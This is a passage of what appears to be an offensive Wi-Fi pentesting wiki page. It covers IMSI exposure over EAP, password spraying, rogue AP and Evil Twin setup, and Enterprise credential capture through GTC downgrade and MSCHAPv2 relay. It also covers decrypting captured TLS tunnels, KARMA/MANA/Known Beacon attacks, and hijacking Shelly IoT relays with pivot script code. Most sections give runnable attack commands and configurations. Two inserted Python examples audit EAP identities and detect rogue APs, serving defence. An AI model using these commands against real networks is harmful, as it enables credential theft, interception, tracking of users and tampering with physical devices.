# 5) Inspect the first EAP-Response/Identity frame
# Expected: ASCII NAI containing IMSI, e.g.
# 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org

Notes:
- Works before any TLS tunnel if the design uses EAP‑SIM/AKA natively without protected identities/pseudonyms.
- The exposed value is a permanent identifier tied to the subscriber's SIM; harvesting it enables long-term tracking and follow-on telecom abuse.

Impact
- Privacy: persistent user/device tracking from passive Wi‑Fi capture in public areas.
- Telecom abuse bootstrap: with the IMSI, an attacker with SS7/Diameter access can query location or attempt to intercept/hijack voice/SMS and steal MFA.

Mitigations / things to check
- Verify that clients use anonymous outer identities (pseudonyms) for EAP‑SIM/AKA as recommended by 3GPP (e.g., 3GPP TS 33.402).
- Prefer placing the identity phase inside a tunnel (e.g., EAP‑TTLS/PEAP carrying inner EAP‑SIM/AKA) so the IMSI is never sent in the clear.
- Packet captures of association/auth should never reveal the raw IMSI in EAP-Response/Identity.
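The last check above, and the two earlier sections on cleartext usernames and anonymous outer identities, as one small audit in Python. This is an added example, not code from the page: it parses an EAP-Response/Identity packet (RFC 3748 layout: code, identifier, length, type, type-data) and labels the identity by how much it gives away on the air. The labels, the assumption that a bare 14- or 15-digit username in a 3gppnetwork.org realm is an IMSI, and the handling of the RFC 4186/4187 prefix digits ('1'/'0' permanent, '3'/'2' pseudonym, '5'/'4' fast re-authentication) are mine; the sample frames and IMSI digits are constructed, not captured.

```python
import struct
from typing import Optional

EAP_RESPONSE = 2        # EAP Code: 1 = Request, 2 = Response
EAP_TYPE_IDENTITY = 1   # EAP Type: Identity


def parse_eap_identity(pkt: bytes) -> Optional[str]:
    """Return the identity string if `pkt` is an EAP-Response/Identity, else None."""
    if len(pkt) < 5:
        return None
    code, _ident, length = struct.unpack("!BBH", pkt[:4])
    if code != EAP_RESPONSE or pkt[4] != EAP_TYPE_IDENTITY or length < 5 or length > len(pkt):
        return None
    # Type-Data is the NAI; some clients append a NUL plus options, which are dropped here.
    return pkt[5:length].split(b"\x00", 1)[0].decode("utf-8", "replace")


def build_eap_identity_response(identity: str, ident: int = 1) -> bytes:
    """Encode an EAP-Response/Identity (used only to construct sample frames)."""
    data = identity.encode("utf-8")
    return struct.pack("!BBHB", EAP_RESPONSE, ident, 5 + len(data), EAP_TYPE_IDENTITY) + data


def classify_identity(identity: str) -> str:
    """Label an outer EAP identity by how much it reveals to a passive listener."""
    user, _, realm = identity.partition("@")
    if user in ("", "anonymous"):
        return "anonymous"            # outer identity hidden; the real user is sent inside the TLS tunnel
    if realm.endswith(".3gppnetwork.org"):
        # Assumption: accept both the bare IMSI (as in the example above) and the
        # RFC 4186/4187 form with a leading '1' (SIM) or '0' (AKA) permanent-identity prefix.
        digits = user[1:] if user[:1] in "01" else user
        if digits.isdigit() and 14 <= len(digits) <= 15:
            return "permanent-imsi"   # the leak this section describes
        if user[:1] in "23":
            return "pseudonym"        # operator-issued temporary identity
        if user[:1] in "45":
            return "fast-reauth"
    return "cleartext-username"       # a real username visible to anyone listening


def audit_identities(pkts) -> list:
    """Return (identity, label) for every EAP-Response/Identity among the given packets."""
    findings = []
    for pkt in pkts:
        ident = parse_eap_identity(pkt)
        if ident is not None:
            findings.append((ident, classify_identity(ident)))
    return findings


# Constructed sample frames; the IMSI digits are made up, not a real subscriber.
SAMPLE_PACKETS = [
    bytes.fromhex("0101000501"),  # EAP-Request/Identity from the authenticator: not a response
    build_eap_identity_response("208150123456789@wlan.mnc015.mcc208.3gppnetwork.org"),
    build_eap_identity_response("anonymous@realm_x"),
    build_eap_identity_response("jdoe@corp.example"),
]

if __name__ == "__main__":
    for identity, label in audit_identities(SAMPLE_PACKETS):
        print(f"{label:18} {identity}")
```

Run the same function over the EAP payloads of a real capture (for instance the frames matched by `eap.code == 2 && eap.type == 1` above) and any `permanent-imsi` or unexpected `cleartext-username` finding is a deployment that needs pseudonyms or a tunnelled identity phase.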

Related: Telecom signalling exploitation with captured mobile identifiers (see Telecom Network Exploitation, ../pentesting-network/telecom-network-exploitation.md)

EAP-Bruteforce (password spray)

If the client is expected to use a username and password (notice that EAP-TLS won't be valid in this case), then you could try to get a list of usernames (see next part) and passwords and try to bruteforce the access using air-hammer (https://github.com/Wh1t3Rh1n0/air-hammer).

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

You can also perform this attack using eaphammer:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Client attacks theory

Network selection and roaming

  • The 802.11 protocol defines how a station joins an Extended Service Set (ESS) but does not specify the criteria for selecting an ESS or an access point (AP) within it.
  • Stations can roam between APs sharing the same ESSID, maintaining connectivity across a building or area.
  • The protocol requires station authentication to the ESS but does not mandate AP authentication to the station.

Preferred Network Lists (PNLs)

  • Stations store the ESSID of every wireless network they connect to in their Preferred Network List (PNL), along with network-specific configuration details.
  • The PNL is used to automatically connect to known networks, improving the user's experience by streamlining the connection process.

Passive Scanning

  • APs periodically broadcast beacon frames, announcing their presence and features, including the AP's ESSID unless broadcasting is disabled.
  • During passive scanning, stations listen for beacon frames. If a beacon's ESSID matches an entry in the station's PNL, the station may automatically connect to that AP.
  • Knowledge of a device's PNL allows potential exploitation by mimicking a known network's ESSID, tricking the device into connecting to a rogue AP.

Active Probing

  • Active probing involves stations sending probe requests to discover nearby APs and their characteristics.
  • Directed probe requests target a specific ESSID, helping to detect whether a particular network is within range, even if it is a hidden network.
  • Broadcast probe requests have a null SSID field and are sent to all nearby APs, letting the station check for any preferred network without disclosing the contents of its PNL.

Simple AP with redirection to Internet

Before explaining how to perform more complex attacks, it will be explained how to just create an AP and redirect its traffic to an interface connected to the Internet.

Using ifconfig -a check that the wlan interface to create the AP and the interface connected to the Internet are present.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

Create the config file /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Then set the IPs and routes:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

And then start dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Create the configuration file hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Stop annoying processes, set monitor mode and start hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Forwarding and Redirection

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

The Evil Twin attack exploits how WiFi clients identify networks, mainly relying on the network name (ESSID) without requiring the base station (access point) to authenticate itself to the client. Key points include:

  • Difficulty in Differentiation: Devices struggle to distinguish between legitimate and rogue access points when they share the same ESSID and encryption type. Real-world networks often use multiple access points with the same ESSID to extend coverage seamlessly.
  • Client Roaming and Connection Manipulation: The 802.11 protocol allows devices to roam between access points within the same ESS. Attackers can exploit this by luring a device into dropping its current base station and joining a rogue access point. This can be achieved by offering a stronger signal or by disrupting the connection to the legitimate access point through methods such as deauthentication packets or jamming.
  • Challenges in Execution: Successfully executing an Evil Twin attack in environments with multiple, well-placed access points can be challenging. Deauthenticating a single legitimate access point often results in the device connecting to another legitimate access point, unless the attacker can deauthenticate all nearby access points or place the rogue access point strategically.

You can create a very basic Open Evil Twin (no capabilities to route traffic to the Internet) by running:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

You can also create an Evil Twin using eaphammer (note that to create evil twins with eaphammer the interface should not be in monitor mode):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Or using Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

Please note that by default, if an ESSID in the PNL is saved as WPA protected, the device won't connect automatically to an Open Evil Twin. You can try to DoS the real AP and hope the user connects manually to your Open Evil Twin, or you can DoS the real AP and use a WPA Evil Twin to capture the handshake (using this method you won't be able to let the victim connect to you, as you don't know the PSK, but you can capture the handshake and try to crack it).

Some OS and AV will warn the user that connecting to an Open network is dangerous…

WPA/WPA2 Evil Twin

You can create an Evil Twin using WPA/2 and, if the devices are configured to connect to that SSID with WPA/2, they are going to try to connect. However, to complete the 4-way handshake you also need to know the password the client is going to use. If you don't know it, the connection won't be completed.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

To understand these attacks I recommend reading the brief WPA Enterprise explanation first.

Using hostapd-wpe

hostapd-wpe needs a configuration file to work. To automate the generation of these configuration files you can use https://github.com/WJDigby/apd_launchpad (download the python file inside /etc/hostapd-wpe/)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

In the configuration file you can select many different things such as ssid, channel, user files, cert/key, dh parameters, wpa version and auth…

Using hostapd-wpe with EAP-TLS to allow any certificate to login.

Using EAPHammer

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

By default, EAPHammer uses these authentication methods (notice GTC as the first one, to try to obtain plaintext passwords, followed by the more robust auth methods):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

This is the default methodology to avoid long connection times. However, you can also specify to the server the authentication methods from weakest to strongest:

--negotiate weakest

Or you could also use:

  • --negotiate gtc-downgrade to use a highly efficient GTC downgrade implementation (plaintext passwords)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP to specify manually the methods offered (offering the same auth methods in the same order as the organisation, the attack will be much more difficult to detect).
  • Find more info in the wiki

When clients stop validating RADIUS certificates (PEAP/TTLS)

  • If devices are configured with “do not validate certificate”, a cloned AP + rogue RADIUS (eaphammer --cert-wizard --creds --auth wpa-eap) will collect NetNTLMv2 (PEAP-MSCHAPv2) or cleartext creds (PEAP-GTC). bettercap deauth (wifi.deauth <BSSID>) both reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks spoofed deauth.
  • Cracked NetNTLMv2 yields reusable Wi‑Fi/AD creds; GTC yields plaintext immediately.

Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)

  • For machine accounts with uncrackable random passwords, use an MSCHAPv2 relay: run hostapd-mana as the Evil Twin, forwarding the MSCHAPv2 exchange to wpa_sycophant, which simultaneously connects to the legitimate AP. A successful relay yields authenticated Wi‑Fi without ever recovering the passwords.
  • Use builds that support the target security level (WPA3/PMF needs recent hostapd/wpa_supplicant); PMF prevents forced deauth, so wait for the client to reconnect on its own.

Using Airgeddon

Airgeddon can use previously generated certificates to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to capture the user and the MD5 of the password. Later, the attacker can try to crack the password.
Airgeddon offers you the possibility of a continuous Evil Twin attack (noisy) or only creating the Evil Twin until someone connects (smooth).

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twin attacks

This method was tested in a PEAP connection but as I'm decrypting an arbitrary TLS tunnel this should also work with EAP-TTLS

Inside the hostapd-wpe configuration, comment out the line that contains dh_file (from dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh)
This will make hostapd-wpe exchange keys using RSA instead of DH, so you will be able to decrypt the traffic later knowing the server's private key.

Now start the Evil Twin using hostapd-wpe with the modified configuration as usual. Also, start wireshark on the interface performing the Evil Twin attack.

Now or later (once you have captured some authentication attempts) you can add the private RSA key to wireshark in: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Add a new entry and fill the form with these values: IP address = any, Port = 0, Protocol = data, Key File = (select your key file; to avoid problems select a key file that is not password protected).

Then look at the new "Decrypted TLS" tab:

KARMA, MANA, Loud MANA and Known beacons attacks

ESSID and MAC black/whitelists

The different types of Media Access Control Filter Lists (MFACLs), their corresponding modes and their effect on the behaviour of a rogue Access Point (AP):

  1. MAC-based Whitelist:
  • The rogue AP will only respond to probe requests from the devices specified in the whitelist, remaining invisible to all others not listed.
  2. MAC-based Blacklist:
  • The rogue AP will ignore probe requests from the devices on the blacklist, effectively making the rogue AP invisible to those specific devices.
  3. SSID-based Whitelist:
  • The rogue AP will respond to probe requests only for the specific ESSIDs listed, making it invisible to devices whose Preferred Network Lists (PNLs) do not contain those ESSIDs.
  4. SSID-based Blacklist:
  • The rogue AP will not respond to probe requests for the specific ESSIDs on the blacklist, making it invisible to devices seeking those particular networks.

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

This technique allows an attacker to create a malicious access point (AP) that responds to all probe requests from devices looking to connect to networks. The technique tricks devices into connecting to the attacker's AP by mimicking the networks the devices are looking for. Once a device sends a connection request to this rogue AP, it completes the connection, causing the device to connect mistakenly to the attacker's network.

MANA

Later, devices started ignoring unsolicited network responses, reducing the effectiveness of the original karma attack. However, a new method, called the MANA attack, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests with network names (SSIDs) the devices had previously solicited. This sophisticated attack bypasses the protections against the original karma attack by exploiting how devices remember and prioritise known networks.

The MANA attack works by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the device's MAC address and the requested network name, adding this information to a list. When a broadcast request is received, the AP responds with information matching any of the networks on the device's list, enticing the device to connect to the rogue AP.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

The Loud MANA attack is an advanced strategy for when devices do not use directed probing or when their Preferred Network Lists (PNL) are unknown to the attacker. It works on the principle that devices in the same area are likely to share some network names in their PNLs. Instead of responding selectively, this attack broadcasts probe responses for every network name (ESSID) found in the combined PNLs of all observed devices. This broader approach increases the chance of a device recognising a familiar network and attempting to connect to the rogue Access Point (AP).

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

When the Loud MANA attack may not suffice, the Known Beacon attack offers another approach. This method brute-forces the connection process by simulating an AP that responds to any network name, cycling through a list of potential ESSIDs derived from a wordlist. This simulates the presence of numerous networks, hoping to match an ESSID in the victim's PNL and prompt a connection attempt to the fake AP. The attack can be amplified by combining it with the --loud option for a more aggressive attempt to lure devices.

Eaphammer implemented this attack as a MANA attack where all the ESSIDs in a list are broadcast (you could also combine this with --loud to create a Loud MANA + Known beacons attack):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

The Known Beacon Burst attack involves the rapid broadcasting of beacon frames for each ESSID listed in a file. This creates a dense environment of fake networks, greatly increasing the likelihood of devices connecting to the rogue AP, especially when combined with a MANA attack.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
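From the defender's side, the Evil Twin section above and the KARMA/MANA/Known Beacon sections share observable signatures: a known ESSID advertised from a BSSID that is not in the AP inventory, a WPA2 ESSID suddenly advertised as Open, and a single BSSID beaconing or answering probes for many unrelated ESSIDs. The following detector is an added example (not code from the page or from any tool it names) that runs those three checks over a constructed set of observed management frames; the BSSID de:ad:be:ef:13:37 is reused from the forge-beacons example above, and the inventory and threshold are assumptions.

```python
from collections import defaultdict

# Constructed sample of 802.11 management frames as a wireless IDS sensor might
# log them: (frame type, BSSID, ESSID, security). Hypothetical data.
OBSERVED = [
    ("beacon", "00:11:22:33:44:01", "CorpWifi", "WPA2"),
    ("beacon", "00:11:22:33:44:02", "CorpWifi", "WPA2"),        # 2nd legit AP, same ESS
    ("beacon", "de:ad:be:ef:13:37", "CorpWifi", "OPEN"),        # open twin, unknown BSSID
    ("probe-resp", "de:ad:be:ef:13:37", "HomeNet", "OPEN"),     # answers probes for
    ("probe-resp", "de:ad:be:ef:13:37", "CafeFree", "OPEN"),    # names it never beacons
    ("probe-resp", "de:ad:be:ef:13:37", "Airport_WiFi", "OPEN"),
    ("beacon", "00:11:22:33:44:02", "CorpWifi", "WPA2"),
]

# Assumed AP inventory of the organisation: ESSID -> set of legitimate BSSIDs.
KNOWN_BSSIDS = {"CorpWifi": {"00:11:22:33:44:01", "00:11:22:33:44:02"}}
# Assumed security baseline per ESSID.
BASELINE_SECURITY = {"CorpWifi": "WPA2"}
# A real AP may legitimately serve a few ESSIDs (multi-SSID). More distinct
# names than this from one BSSID is KARMA/MANA/Known-Beacon behaviour.
MAX_ESSIDS_PER_BSSID = 3


def analyse(frames, known=KNOWN_BSSIDS, baseline=BASELINE_SECURITY,
            max_essids=MAX_ESSIDS_PER_BSSID):
    """Return a sorted list of (bssid, finding) tuples for the frames seen."""
    findings = set()
    essids_by_bssid = defaultdict(set)
    for _ftype, bssid, essid, sec in frames:      # beacons and probe responses both count
        essids_by_bssid[bssid].add(essid)
        # Evil Twin: our ESSID advertised by a BSSID that is not ours.
        if essid in known and bssid not in known[essid]:
            findings.add((bssid, f"evil-twin: unknown BSSID advertising {essid}"))
        # Downgrade: a protected ESSID offered as an Open network.
        if essid in baseline and sec == "OPEN" and baseline[essid] != "OPEN":
            findings.add((bssid, f"downgrade: {essid} advertised as OPEN "
                                 f"(expected {baseline[essid]})"))
    # KARMA/MANA/Known Beacons: one radio claiming to be many networks.
    for bssid, names in essids_by_bssid.items():
        if len(names) > max_essids:
            findings.add((bssid, f"karma/mana: {len(names)} distinct ESSIDs from one BSSID"))
    return sorted(findings)


if __name__ == "__main__":
    for bssid, msg in analyse(OBSERVED):
        print(bssid, msg)
```

On the constructed sample only de:ad:be:ef:13:37 is flagged, once for each of the three patterns; the two inventoried APs produce no findings.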

Wi-Fi Direct

Wi-Fi Direct is a protocol that allows devices to link directly with each other using Wi‑Fi, without the need for a traditional access point. This capability is integrated into various Internet of Things (IoT) devices, such as printers and televisions, allowing direct device-to-device communication. A notable feature of Wi‑Fi Direct is that one device takes on the role of an access point, known as the group owner, to manage the connection.

Security for Wi-Fi Direct connections is established through Wi‑Fi Protected Setup (WPS), which supports several methods for secure pairing, including:

  • Push-Button Configuration (PBC)
  • PIN entry
  • Near-Field Communication (NFC)

These methods, particularly PIN entry, are susceptible to the same vulnerabilities as WPS in traditional Wi‑Fi networks, making them targets for similar attack vectors.

EvilDirect Hijacking

EvilDirect Hijacking is an attack specific to Wi‑Fi Direct. It mirrors the concept of an Evil Twin attack but targets Wi‑Fi Direct connections. In this scenario, an attacker impersonates a legitimate group owner with the aim of deceiving devices into connecting to a malicious entity. This method can be executed using tools like airbase-ng by specifying the channel, ESSID, and MAC address of the impersonated device:

Commissioning AP persistence & dual-homed IoT pivoting (Shelly Gen4 case)

Some consumer IoT relays/controllers leave the commissioning open AP active after joining the IoT WLAN (e.g., Shelly Gen4 SSIDs starting with Shelly). The device remains dual-homed: an AP interface with the default IP 192.168.33.1 plus a client interface on the local WLAN.

Abuse flow (Wi‑Fi proximity required):

  1. Join the provisioning AP, obtain a DHCP lease, and browse the AP-side HTTP API.
  2. Toggle relays via unauthenticated endpoints, e.g. http://192.168.33.1/relay/0?turn=on (can affect doors/shutters/garages). Firmware upload endpoints may add persistence.
  3. Use it as a pivot: Shelly scripting can send HTTP from the internal interface to other LAN hosts. Example pivot to another Shelly at 10.0.98.221:
Shelly.addEventHandler(function (event) {
if (event.component === "switch:0" && event.info.state) {
Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
}
});

Replace the URL with any reachable internal HTTP target; dual-homing avoids the need for extra routing/NAT work.
  4. At scale: search vendor SSIDs on wigle.net (e.g., Shelly) to locate commissioning APs for local exploitation.

For persistence, leave the commissioning AP enabled.

References

TODO: Take a look at https://github.com/wifiphisher/wifiphisher (to check Facebook login and WPA impersonation on captive portals)
